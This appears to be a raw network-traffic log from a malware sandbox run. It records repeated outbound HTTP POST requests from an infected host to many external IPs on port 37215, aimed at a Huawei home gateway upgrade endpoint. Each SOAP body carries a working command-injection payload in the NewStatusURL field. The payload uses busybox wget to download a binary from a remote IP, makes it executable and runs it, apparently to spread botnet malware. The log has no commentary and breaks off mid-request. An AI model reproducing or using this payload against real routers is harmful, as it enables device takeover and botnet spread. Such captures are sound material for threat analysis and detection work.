                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1576192.168.2.153325841.230.53.9137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108768940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1577192.168.2.154411441.238.150.20337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108771086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1578192.168.2.153962641.59.207.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108772039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1579192.168.2.154635441.169.206.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108803034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1580192.168.2.153349241.54.246.3037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108809948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1581192.168.2.155345241.154.213.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108810902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1582192.168.2.154764841.240.104.837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108869076 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1583192.168.2.154352441.242.79.037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108874083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1584192.168.2.153826641.51.80.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108874083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1585192.168.2.154721041.246.218.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108874083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
